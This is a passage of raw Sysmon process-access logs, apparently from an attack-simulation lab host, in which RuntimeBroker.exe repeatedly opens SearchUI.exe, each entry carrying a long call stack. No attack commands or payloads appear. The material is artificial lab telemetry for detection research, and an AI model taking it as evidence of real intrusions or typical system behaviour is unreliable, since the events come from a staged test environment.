13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000011505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 